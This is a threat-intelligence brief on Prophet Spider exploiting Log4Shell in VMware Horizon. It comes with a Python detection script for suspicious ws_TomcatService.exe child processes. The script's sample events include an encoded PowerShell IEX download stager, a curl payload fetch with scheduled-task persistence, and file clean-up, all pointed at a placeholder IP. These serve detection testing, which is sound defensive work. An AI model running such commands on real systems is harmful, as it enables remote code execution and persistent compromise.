2022-02-01

Log4Shell and Coinminers

Level: Tactical  |  Source: BlackBerry Cybersecurity


BlackBerry Research & Intelligence and Incident Response (IR) identified attacks by the threat group Prophet Spider that leveraged the Log4j vulnerability (Log4Shell) against the VMware Horizon platform. Attacks associated with the vulnerability were identified largely by monitoring child processes of ws_TomcatService.exe, which led to the execution of scripting interpreters such as PowerShell or cmd. Post-exploitation, additional tools could be downloaded with PowerShell via encoded commands or Invoke-Expression, or with curl. To maintain persistence, scheduled tasks were created along with web shells. Lastly, clean-up of files was also observed to remove indicators.
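The detection opportunity described above (scripting interpreters spawned by ws_TomcatService.exe, then annotated with the post-exploitation behaviours the report lists) can be expressed as a small hunt over process-creation telemetry. The following is an added example and is not code from BlackBerry or Anvilogic; the events are constructed in the style of Sysmon Event ID 1 (ParentImage, Image, CommandLine), the Horizon install path, the IP addresses and the indicator regexes are assumptions, and pwsh.exe is added to the interpreter list as an assumption for PowerShell 7 hosts.

```python
"""Hunt for the Log4Shell-on-Horizon pattern: ws_TomcatService.exe spawning a scripting
interpreter, with the command line tagged for encoded PowerShell, Invoke-Expression,
download tools, scheduled-task creation and file clean-up. Added example, not vendor code."""
import base64
import ntpath
import re

# Child interpreters named in the report; pwsh.exe is an assumption (PowerShell 7).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
PARENT = "ws_tomcatservice.exe"

# Indicator regexes are assumptions derived from the behaviours listed in the report.
INDICATORS = [
    ("invoke_expression", re.compile(r"\b(invoke-expression|iex)\b", re.I)),
    ("download", re.compile(r"\b(curl|wget|certutil|downloadstring|downloadfile)\b", re.I)),
    ("scheduled_task", re.compile(r"schtasks(\.exe)?\s+/create|register-scheduledtask", re.I)),
    ("cleanup", re.compile(r"\b(del|erase|remove-item|rm)\b", re.I)),
]
# -e/-enc/-EncodedCommand followed by a base64 blob (PowerShell decodes it as UTF-16LE).
ENCODED = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return a finding for ws_TomcatService.exe -> interpreter events, else None."""
    if ntpath.basename(event["ParentImage"]).lower() != PARENT:
        return None
    child = ntpath.basename(event["Image"]).lower()
    if child not in INTERPRETERS:
        return None
    cmdline = event["CommandLine"]
    tags = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags.append("encoded_command")
        cmdline = cmdline + " " + decoded  # inspect the decoded payload as well
    for label, pattern in INDICATORS:
        if pattern.search(cmdline):
            tags.append(label)
    return {"child": child, "tags": tags, "decoded": decoded}


def analyze_events(events):
    """Run analyze_event over a batch of events and keep only the hits."""
    return [f for f in (analyze_event(e) for e in events) if f]


# --- constructed sample telemetry (not real events) ---------------------------------
TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"  # assumed path
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/x.ps1')".encode("utf-16le")
).decode()

SAMPLE_EVENTS = [
    # 1: encoded PowerShell stager spawned by the Horizon Tomcat service
    {"ParentImage": TOMCAT, "Image": POWERSHELL,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD},
    # 2: cmd.exe fetching a tool with curl, then creating a scheduled task for persistence
    {"ParentImage": TOMCAT, "Image": CMD,
     "CommandLine": "cmd.exe /c curl -o C:\\Windows\\Temp\\svc.exe http://198.51.100.10/svc.exe "
                    "&& schtasks /create /tn svc /tr C:\\Windows\\Temp\\svc.exe /sc minute /mo 5"},
    # 3: clean-up of the dropped file
    {"ParentImage": TOMCAT, "Image": CMD,
     "CommandLine": "cmd.exe /c del /f /q C:\\Windows\\Temp\\svc.exe"},
    # 4: benign: Tomcat spawning its JRE (must not fire)
    {"ParentImage": TOMCAT, "Image": r"C:\Program Files\VMware\VMware View\Server\jre\bin\java.exe",
     "CommandLine": "java.exe -version"},
    # 5: benign: PowerShell started from the desktop, not from Tomcat (must not fire)
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,
     "CommandLine": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(finding["child"], finding["tags"])
```

The parent/child pairing alone is the high-signal part of this rule; the tags only prioritise triage. Tuning the download and clean-up regexes against your own Horizon hosts is expected, since "del" and "curl" also appear in legitimate administration.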

